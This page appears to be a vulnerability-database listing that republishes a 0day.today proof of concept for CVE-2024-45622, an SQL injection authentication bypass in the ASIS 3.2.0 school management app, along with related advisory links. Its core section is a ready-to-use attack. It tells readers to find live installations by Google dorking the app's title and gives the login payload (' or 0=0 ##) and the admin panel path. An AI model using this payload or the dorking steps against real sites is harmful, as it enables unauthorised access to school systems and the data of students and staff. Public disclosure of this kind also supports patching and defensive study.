Lucene search

K

ASIS 3.2.0 SQL Injection Vulnerability

🗓️ 11 Sep 2024 00:00:00Reported by checkgueType 
zdt
 zdt
🔗 0day.today👁 86 Views

ASIS Aplikasi Sistem Sekolah CodeIgniter 3 SQL Injection Bypas

Show more
Related
Code
ReporterTitlePublishedViews
Family
Vulnrichment
CVE-2024-45622
2 Sep 202400:00
vulnrichment
Packet Storm
ASIS 3.2.0 SQL Injection
5 Sep 202400:00
packetstorm
CVE
CVE-2024-45622
2 Sep 202419:15
cve
Cvelist
CVE-2024-45622
2 Sep 202400:00
cvelist
NVD
CVE-2024-45622
2 Sep 202419:15
nvd
Nuclei
ASIS - SQL Injection Authentication Bypass
16 Sep 202413:14
nuclei
============================================================================================================================================
| # Title     : ASIS | Aplikasi Sistem Sekolah using CodeIgniter 3 - SQL Injection Authentication Bypass                                   |
| # Author    : checkgue                                                                                                                   |
| # Tested on : windows 10 (Home) / Browser : Google Chrome 128.0.6613.114 (Official Build) (64-bit)                                       |
| # Vendor    : https://www.facebook.com/groups/181558652941070/                                                                           |
============================================================================================================================================

poc :

[+] Dorking İn Google or Other Search Enggine. "ASIS | Aplikasi Sistem Sekolah"

[+] Use payload : user & pass = ' or 0=0 ##

[+] Panel : http://localhost/asispanel/

CVE: CVE-2024-45622

References:
https://aegislens.com/home/cve-2024-45622/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45622
https://www.cve.org/CVERecord?id=CVE-2024-45622
https://nvd.nist.gov/vuln/detail/CVE-2024-45622
https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md
https://github.com/advisories/GHSA-8hxv-6g4p-2w59

Greetings to : =====
Meta4sec * Bungker |
====================

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo